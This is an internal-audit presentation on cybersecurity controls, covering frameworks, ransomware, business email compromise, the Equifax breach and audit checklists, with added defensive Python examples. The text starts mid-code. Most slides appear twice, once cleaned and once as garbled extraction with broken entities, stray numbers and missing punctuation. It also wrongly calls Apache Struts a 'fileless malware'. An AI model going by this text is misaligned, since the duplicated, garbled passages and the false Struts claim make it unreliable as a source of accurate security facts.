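if __name__ == "__main__":
    ranked, above = mitigating_control_counts(SYSTEMS)
    for name, threat, score in above:
        print(f"{score:>4}  {name}: {threat}")
    print("MITIGATING CONTROL COUNTS")
    for control, n in ranked:
        print(f"{n:>4}  {control}")
```

Note that a score of exactly 100 (the ERP ransomware row) is excluded by step B, and a system whose highest score is below threshold contributes nothing even if it has several threats.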
STEP 4 - CYBERSECURITY REPORTING
• Leverage information gained during the project to provide management with a detailed mapping of the organization's cybersecurity position
• Consider using the COBIT Process Capability Model to map out the CSC framework, which will allow management to begin tracking cybersecurity maturity
COBIT capability levels:
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 r5, Recommended Security Controls for Federal Information Systems and Organizations
• NIST Cyber Security Framework v1.1
• Various other NIST special publications
Center for Internet Security
• Critical Security Controls (formerly SANS Top 20)
International Organization for Standardization
• ISO 27001 family: Information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5

Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%). Source: itgovernanceusa.com
According to Tenable's Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework in their organization and 44% use more than one framework. Source: itgovernanceusa.com

CENTER FOR INTERNET SECURITY - CRITICAL SECURITY CONTROLS
CYBERSECURITY - WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don't just think SOX
• Confirm IT is not using privileged accounts for daily tasks, which can include browsing the internet or answering email
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing)
• Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
• Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company
• Determine whether your company conducts random phishing awareness training campaigns
• Evaluate your company's overall cybersecurity training and awareness program
CYBERSECURITY - WHAT INTERNAL AUDIT CAN DO
Vulnerability Management
• Most companies fail to implement sound patch management processes and procedures, which includes:
  • 99% of exploited vulnerabilities were compromised more than a year after the patch was published
  • Companies do not know all of the information devices on their network and therefore are unable to adequately assess their patch management process
• Ensure your IT department is scanning all assets continuously so that newly discovered vulnerabilities are identified quickly
• Validate that the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. This includes workstations, servers, network equipment, VMware, Citrix, non-Microsoft software, etc.
• If known vulnerabilities cannot be patched due to business reasons, determine whether those risks are formally accepted and tracked by management. Assess whether there are sufficient mitigating controls in place
CYBERSECURITY - SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANY
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Understand your company's fundamental process around patch management and focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and are properly segregated
• Understand the coverage and terms of your company's cyber insurance policy
• Assess the requirement for multi-factor authentication
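The patch-management checks from the Vulnerability Management slide and the quick hit list (device inventory, patch age, internet-facing focus, formally accepted risks), worked as an added Python example that is not from the presentation; the inventory rows, field names and day thresholds are constructed assumptions.

```python
"""Added example (not from the presentation).

Audit-style check over a device inventory for the patch-management points on
these slides: how long a vendor patch has been available but not applied,
whether the device is internet facing, and whether an unpatched item is
covered by a formally accepted, tracked risk. The inventory rows, the field
names and the day thresholds are constructed assumptions.
"""
from collections import Counter
from dataclasses import dataclass
from datetime import date
from typing import Iterable, List, Optional, Tuple

AS_OF = date(2018, 11, 1)  # assumed audit date


@dataclass(frozen=True)
class Device:
    name: str
    software: str
    internet_facing: bool
    patch_released: Optional[date]  # vendor release date of the outstanding patch, None if none outstanding
    patch_applied: Optional[date]   # when that patch was applied, None if not yet
    risk_accepted: bool = False     # formally accepted and tracked by management


def patch_age_days(d: Device, as_of: date = AS_OF) -> int:
    """Days a vendor patch has been available without being applied (0 if patched)."""
    if d.patch_released is None:
        return 0
    if d.patch_applied is not None and d.patch_applied >= d.patch_released:
        return 0
    return (as_of - d.patch_released).days


def rate(d: Device, as_of: date = AS_OF) -> str:
    """Assumed rating scale. The slide's point that 99% of exploited
    vulnerabilities were compromised over a year after the patch was published
    is why anything older than 365 days is critical regardless of exposure."""
    age = patch_age_days(d, as_of)
    if age == 0:
        return "patched"
    if d.risk_accepted:
        return "accepted-risk"  # reported separately, not silently dropped
    if age > 365 or (d.internet_facing and age > 30):
        return "critical"
    if age > 90 or d.internet_facing:
        return "high"
    return "medium"


def audit(devices: Iterable[Device], as_of: date = AS_OF) -> List[Tuple[str, int, str]]:
    """Findings sorted worst first: (rating, patch age in days, device name)."""
    order = {"critical": 0, "high": 1, "medium": 2, "accepted-risk": 3, "patched": 4}
    rows = [(rate(d, as_of), patch_age_days(d, as_of), d.name) for d in devices]
    return sorted(rows, key=lambda r: (order[r[0]], -r[1], r[2]))


def summary(findings: Iterable[Tuple[str, int, str]]) -> Counter:
    """Count of findings per rating, for the management report."""
    return Counter(r[0] for r in findings)


# Constructed inventory; names, software and dates are made up.
INVENTORY = (
    Device("web-claims-01", "web application framework", True, date(2018, 3, 6), None),
    Device("file-srv-02", "server OS (file sharing)", False, date(2017, 6, 1), None),
    Device("wks-finance-07", "Java runtime", False, date(2018, 7, 17), date(2018, 8, 2)),
    Device("citrix-gw-01", "remote access gateway", True, date(2018, 10, 15), None),
    Device("scada-hmi-01", "legacy OS past end of life", False, date(2016, 1, 12), None,
           risk_accepted=True),
    Device("print-srv-03", "print server", False, date(2018, 9, 20), None),
)

if __name__ == "__main__":
    findings = audit(INVENTORY)
    for rating, age, name in findings:
        print(f"{rating:<14} {age:>5} days  {name}")
    print(dict(summary(findings)))
```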
ANATOMY OF AN ATTACK

QUESTIONS
David Losacco, Principal
mobile (918) 625-8870
davidlosacco@stinnett-associates.com
Stinnett & Associates, stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa

ATTACKS IN THE HEADLINES
https://www.zdnet.com/article/man-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
https://krebsonsecurity.com/2018/09/secret-service-warns-of-surge-in-atm-wiretapping-attacks/comment-page-1
https://www.scmagazine.com/home/security-news/cisco-patches-prime-license-manager-sql-injection-vulnerability
https://www.techrepublic.com/article/british-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
COMMON TERMS AND DEFINITIONS
Common Vulnerabilities and Exposures (CVE): Catalog sponsored by Homeland Security that documents known cyber threats. Vulnerabilities are known errors in a system or software that provide an attacker with direct access. Exposures are known errors that allow an attacker indirect access, which may allow the attacker to gather knowledge or content. Many of the malware and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years, but not fixed at the company level.
Zero Day Vulnerability / Attack: An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by the vendor.
Advanced Persistent Threat: A set of stealthy and continuous computer hacking processes, often orchestrated by a person or persons targeting a specific entity.
MALWARE
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.
• Malware is seen as the first access point used in connection with hacking attempts
• Ransomware is a version of malware that has been in the headlines
• Malware can grant command and control of a device to the hackers
• 1 in 131 emails contained malware in 2016
• "Fileless" malware is a new variant that is more difficult to detect
COMPLEXITY BEHIND THE EQUIFAX ATTACK
• Attack started in early March 2017 with hackers using a bot programmed to search the web for a recently released CVE (Common Vulnerability and Exposure)
• It took the hackers two months before they found the vulnerability on one of Equifax's websites used to help customers with claims
• Hackers then used another vulnerability (a Fileless Malware named Apache Struts) that was also a CVE that had been issued a month before but never fixed
• Hackers spent an estimated 76 days in the network and downloaded records from 51 different databases
• Over 148 million records were stolen
• Attack was not identified until July 30, 2017

EQUIFAX - WHAT WAS LOST
In addition to US consumers, the UK Data Protection Authority, the Information Commissioner's Office, reported:
• Approximately 20,000 UK data subjects had names, dates of birth, telephone numbers and driving license numbers exposed
• More than 600,000 UK data subjects had names, dates of birth and telephone numbers exposed
• Up to 15 million UK data subjects had names and dates of birth exposed
COMMON TERMS AND DEFINITIONS
Dark Web / Darknet: Websites located on the internet that are not accessible by normal search engines or means. Darknet sites require special software, such as TOR (The Onion Router), that helps keep users anonymous. Darknet sites are used for several illegal activities, such as black market purchasing of stolen PII or credit card data as well as botnet rentals. Bitcoins are traded on the Dark Web.
Bitcoin: A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger in the cloud that, along with all Bitcoin transactions, is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released to come into circulation; it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more and more bitcoins are created, the difficulty of the mining process, that is, the amount of computing power involved, increases.
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the user's files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key.
• The use of BITCOINS is typically the payment method
• Ransomware attacks were growing at a rate of 350% annually until 2017 and have now dropped, but are still present (HR and Healthcare companies both in February)
• The WannaCry ransomware attack impacted over 200,000 people across 150 countries (included a worm)

RANSOMWARE
Ransomware-as-a-Service (RaaS) allows any amateur attacker to get into the business with basic knowledge and less effort. The amateur attacker can visit a RaaS site on the dark web and set up an account to create the ransomware package. It is up to the attacker to distribute the ransomware, while the RaaS will handle the ransom payments. The RaaS developer takes a cut of any payments that are made. The developer will also reduce their cut depending on the volume of payments received.
BUSINESS EMAIL COMPROMISE (BEC)
• Business Email Compromise (BEC) is an exploit targeting a company's corporate email accounts and impersonating or "spoofing" the email identity of an employee or company executive in order to fraudulently obtain money or sensitive information from the company, its business partners and/or employees
• The FBI's Internet Crime Complaint Center, or IC3, said that based on fraud reports submitted from October 2013 to May 2018 there were 41,058 total US victims of BEC schemes, which collectively lost at least $2.9 billion, while global losses were more than four times that amount (FBI: Global Business Email Compromise Losses Hit $12.5 Billion)
• BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (https://www.sec.gov/litigation/investreport/34-84429.pdf). The report was considered a "highly unusual action" by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
  • All nine lost at least $1 million due to a BEC scam
  • Two companies lost more than $30 million each
  • In total, the nine issuers lost almost $100 million
BEC & PHISHING
Phishing: A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment.
Spear Phishing: Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive).
• CEO email to Treasurer
• HR phishing for employee data
• W-2 phishing data (IRS sent out a warning)
The majority of phishing cases are used as a means to install malware onto a host environment.

PHISHING EMAIL EXAMPLE
Most companies battle the increased phishing and spear-phishing attacks by labeling each external email with some form of the following inserts:
This "band-aid" is still widely in practice today, however
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
COMPLEXITY BEHIND THE EQUIFAX ATTACK
• Attack started in early March 2017 with hackers using a bot programmed to search the web for a recently released CVE (Common Vulnerabilities and Exposures entry)
• It took the hackers two months before they found the vulnerability on one of Equifax's websites used to help customers with claims
• Hackers then used another vulnerability (a fileless malware named Apache Struts) that was also a CVE that had been issued a month before but never fixed
• Hackers spent an estimated 76 days in the network and downloaded records from 51 different databases
• Over 148 million records were stolen
• Attack was not identified until July 30, 2017
21
EQUIFAX – WHAT WAS LOST
In addition to US consumers, the UK Data Protection Authority, the Information Commissioner's Office, reported:
• Approximately 20,000 UK data subjects had names, dates of birth, telephone numbers and driving license numbers exposed
• More than 600,000 UK data subjects had names, dates of birth and telephone numbers exposed
• Up to 15 million UK data subjects had names and dates of birth exposed
22
COMMON TERMS AND DEFINITIONS
Dark Web / Darknet – Websites located on the internet that are not accessible by normal search engines or means. Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or credit card data, as well as botnet rentals. Bitcoins are traded on the Dark Web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger in the cloud that – along with all Bitcoin transactions – is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released to come into circulation; it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more and more bitcoins are created, the difficulty of the mining process – that is, the amount of computing power involved – increases.
23
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the users' files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key.
• The use of bitcoins is typically the payment method
• Ransomware attacks were growing at a rate of 350% annually until 2017 and have now dropped, but are still present (HR and healthcare companies both affected in February)
• The WannaCry ransomware attack impacted over 200,000 people across 150 countries (it included a worm)
24
RANSOMWARE
Ransomware-as-a-Service (RaaS) allows any amateur attacker to get into the business with basic knowledge and less effort. The amateur attacker can visit a RaaS site on the dark web and set up an account to create the ransomware package. It is up to the attacker to distribute the ransomware, while the RaaS will handle the ransom payments. The RaaS developer takes a cut of any payments that are made. The developer will also reduce their cut depending on the volume of payments received.
25
BUSINESS EMAIL COMPROMISE (BEC)
• Business Email Compromise (BEC) is an exploit targeting a company's corporate email accounts and impersonating or "spoofing" the email identity of an employee or company executive in order to fraudulently obtain money or sensitive information from the company, its business partners and/or employees
• The FBI's Internet Crime Complaint Center, or IC3, said that based on fraud reports submitted from October 2013 to May 2018 there were 41,058 total US victims of BEC schemes, which collectively lost at least $2.9 billion, while global losses were more than four times that amount (FBI: Global Business Email Compromise Losses Hit $12.5 Billion)
• BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (https://www.sec.gov/litigation/investreport/34-84429.pdf). The report was considered a "highly unusual action" by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
• All nine lost at least $1 million due to the BEC scam
• Two companies lost more than $30 million each
• In total the nine issuers lost almost $100 million
26
BEC & PHISHING
Phishing – A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment.
Spear Phishing – Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include cloning (using a previous legitimate email) and whaling (attacking a high-level executive).
• CEO email to Treasurer
• HR phishing for employee data
• W-2 phishing for data (the IRS sent out a warning)
The majority of phishing cases are used as a means to install malware onto a host environment.
27
PHISHING EMAIL EXAMPLE
Most companies battle the increased phishing and spear-phishing attacks by labeling each external email with some form of the following inserts:
This "band-aid" is still widely in practice today, however.
28
BEC & OFFICE 365
• Office 365 is Microsoft's cloud-based solution offering everything from email and Excel to cloud storage
• Microsoft Office 365 is now in use at over 70% of Fortune 500 companies
• 20% of all companies use Office 365
• Office 365 overtook Office products in the 4th quarter of 2017 as the largest revenue stream for Microsoft
• Most companies do not correctly set up Office 365 security or logging
• Significant increase in attack vectors against Office 365
• It only takes one employee and the hacker is internal to email and Office 365
• Some attack vectors do not require a phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC – PROTECT YOUR CASH
Accounting controls at all entry/exit points for cash.
Cash Receipts
• Review of balances over 60 days and $10k – a triggered review and communication uncovered a change in bank info (communication was being sent to a deleted email)
• Reports that generate overdue receivables timely for follow-up
• Escalation rules for overdue receivables
Cash Disbursements
• SOD – limit access to the vendor master file
• Controls related to changing bank info for all vendors – need more than email communication; personal verification with the vendor requesting the change
• Vendor set-up – verification of information provided
• ISNetworld – vetting process for vendors; could require vetting prior to set-up as vendors
• ACH debits – no reason to give debit access to the account; if done, dual approval and a ZBA should be used
• Multi-factor authentication
Other Processes to Consider
• Treasury
• Payroll
• Royalties
• SOX Impact
• Cyber Insurance
• Legal Liabilities
• Contract Language
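The two cash controls above with concrete thresholds (receivables over 60 days and $10k, and vendor bank-detail changes needing personal verification and dual approval) written as an audit test, as an added example that is not part of the presentation; all records are constructed and the field names are assumptions.

```python
"""Cash-control checks for BEC exposure (added example, not from the presentation).

Receivables that are both over 60 days old and over $10k are flagged for a
triggered review and customer contact; vendor bank-detail change requests are
flagged unless they were verified with the vendor outside of email and carry
two distinct approvals. All records below are constructed.
"""
from dataclasses import dataclass
from typing import List, Tuple

OVERDUE_DAYS = 60          # the slide's age threshold
OVERDUE_AMOUNT = 10_000    # the slide's $10k threshold
REQUIRED_APPROVALS = 2     # dual approval


@dataclass(frozen=True)
class Receivable:
    customer: str
    amount: float
    days_outstanding: int


@dataclass(frozen=True)
class BankChangeRequest:
    vendor: str
    requested_via: str            # "email", "portal", "letter" (assumed field)
    verified_by_callback: bool    # confirmed by phone with a known vendor contact
    approvals: Tuple[str, ...]    # IDs of the approvers who signed off


def overdue_receivables(receivables) -> List[Receivable]:
    """Balances over 60 days AND over $10k: these trigger review and customer contact."""
    return [r for r in receivables
            if r.days_outstanding > OVERDUE_DAYS and r.amount > OVERDUE_AMOUNT]


def bank_change_exceptions(requests) -> List[Tuple[str, str]]:
    """Return (vendor, reason) for each change request that fails the control."""
    exceptions = []
    for req in requests:
        # Email alone is never sufficient; a callback to the vendor is required
        # regardless of the channel the request arrived on.
        if not req.verified_by_callback:
            exceptions.append((req.vendor, "no personal verification with vendor"))
        # The same approver counted twice is not dual approval.
        if len(set(req.approvals)) < REQUIRED_APPROVALS:
            exceptions.append((req.vendor, "missing dual approval"))
    return exceptions


# Constructed sample data.
RECEIVABLES = [
    Receivable("Acme Drilling", 42_500.00, 75),   # old and large: flagged
    Receivable("Bluewater Co", 8_000.00, 90),     # old but under $10k
    Receivable("Delta Freight", 15_000.00, 30),   # large but current
]
REQUESTS = [
    BankChangeRequest("Acme Drilling", "email", False, ("ap_clerk",)),
    BankChangeRequest("Northwind Supply", "portal", True, ("ap_clerk", "ap_manager")),
    BankChangeRequest("Contoso Services", "email", True, ("ap_clerk", "ap_clerk")),
]

if __name__ == "__main__":
    for r in overdue_receivables(RECEIVABLES):
        print(f"REVIEW  {r.customer}: ${r.amount:,.2f} outstanding {r.days_outstanding} days")
    for vendor, reason in bank_change_exceptions(REQUESTS):
        print(f"EXCEPTION  {vendor}: {reason}")
```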
31
AND MULTI-FACTOR AUTHENTICATION
• Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical security keys in place of passwords and one-time codes
• Office 365 and other cloud-based services should all use multi-factor authentication
32
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach.
The main reasons for companies' struggles are:
• Lack of skilled resources (people and time)
• Lack of funds
• Continued innovations in technology
• Expansion of the attack surface
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
33
DEFENSE IN-DEPTH APPROACH
A defense-in-depth approach to cybersecurity is a layered approach that recognizes a company's first line of defense may fail and integrates multiple layers of defense around a company's information assets. Also called the Castle Approach (once you breach the walls, more defenses are in place).
• Patch Management
• Operating System EOL
• Network Vulnerability Scanning
• Security Staffing
• Internal & External Network Boundaries
• Wireless Security
• Firewall Implementation and Monitoring (including NextGen)
• IPS / IDS / SIEM Implementations
• Firewall Dataflow & Standards Documentation
• Cloud Service Provider Evaluations
• Security Incident Management
• Physical Security
• Evaluation of Encryption Technologies
• Network Access Control
• Workstation Endpoint Protection
